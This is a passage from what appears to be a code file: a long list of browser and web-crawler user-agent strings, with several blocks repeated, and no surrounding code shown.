'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
